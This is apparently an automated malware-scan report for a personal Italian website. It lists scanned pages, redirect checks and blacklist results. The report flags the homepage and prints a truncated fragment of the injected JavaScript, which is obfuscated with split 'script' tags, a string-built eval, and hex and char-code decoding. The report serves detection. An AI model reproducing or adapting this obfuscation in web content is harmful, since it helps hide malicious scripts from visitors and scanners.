Scanned pages/files
Request | Server response | Status |
http://kribo.altervista.org/ | 200 OK Content-Length: 13872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c1z56='';r6c4ef08='ra7a74c4';r1ba49='rdb462eb6';ra7c6cf675=document;if(r6c4ef08+c1z56+r1ba49=='ra7a74c4rdb462eb6'){ rcdc87edbd84=ra7c6cf675};rcdc87edbd84.write('<scr'+'ipt>function rb743a0108a(r18136ba1c){return e'+c1z56+'val(r18136ba1c); }</scr'+'ipt>'); function c15c31878rcb3d0(r7b0a400c96a){ var z5e='';return (rb743a0108a('pa'+z5e+'rseInt')(r7b0a400c96a,16));}function ra70d59(r211e9292){ var rdd6a0ee=2; var r688cb4ed='';r71bf9003d='fromCh';rebad6=String[r71bf9003d+'arC'+'ode'];f Antivirus reports:
| ||
http://codice.shinystat.it/cgi-bin/getcod.cgi?USER=kribo | 200 OK Content-Length: 12 Content-Type: application/x-javascript | clean |
http://kribo.altervista.org/downloads.html | 200 OK Content-Length: 3015 Content-Type: text/html | clean |
http://kribo.altervista.org/eclisseClip.wmv | 404 Not Found Content-Length: 2957 Content-Type: text/html | clean |
http://kribo.altervista.org/test404page.js | 404 Not Found Content-Length: 2956 Content-Type: text/html | clean |
http://kribo.altervista.org/movie_cielodirlanda.wmv | 404 Not Found Content-Length: 2965 Content-Type: text/html | clean |
http://kribo.altervista.org/1gab.wmv | 404 Not Found Content-Length: 2950 Content-Type: text/html | clean |
http://kribo.altervista.org/2gab.wmv | 404 Not Found Content-Length: 2950 Content-Type: text/html | clean |
http://kribo.altervista.org/benedetta.zip | 404 Not Found Content-Length: 2955 Content-Type: text/html | clean |
http://kribo.altervista.org/trekking.zip | 404 Not Found Content-Length: 2954 Content-Type: text/html | clean |
http://kribo.altervista.org/EsameStato_teoria.pdf | 200 OK Content-Length: 303510 Content-Type: application/pdf | clean |
http://kribo.altervista.org/EsameStato2.pdf | 200 OK Content-Length: 300860 Content-Type: application/pdf | clean |
http://kribo.altervista.org/Tulips/Tulips.htm | 200 OK Content-Length: 8564 Content-Type: text/html | clean |
http://kribo.altervista.org/Tulips/1.JPG | 200 OK Content-Length: 184672 Content-Type: image/jpeg | clean |
http://kribo.altervista.org/Tulips/2.JPG | 200 OK Content-Length: 141849 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kribo.altervista.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 18:41:03 GMT
Accept-Ranges: bytes
ETag: "6aa01f-3630-478222d0eabc0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13872
Content-Type: text/html
Last-Modified: Thu, 12 Nov 2009 01:08:07 GMT
...13872 bytes of data.
GET / HTTP/1.1
Host: kribo.altervista.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 18:41:03 GMT
Accept-Ranges: bytes
ETag: "6aa01f-3630-478222d0eabc0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 13872
Content-Type: text/html
Last-Modified: Thu, 12 Nov 2009 01:08:07 GMT
...13872 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kribo.altervista.org
Referer: http://www.google.com/search?q=kribo.altervista.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kribo.altervista.org
Referer: http://www.google.com/search?q=kribo.altervista.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kribo.altervista.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kribo.altervista.org/
Result: kribo.altervista.org is not infected or malware details are not published yet.
Result: kribo.altervista.org is not infected or malware details are not published yet.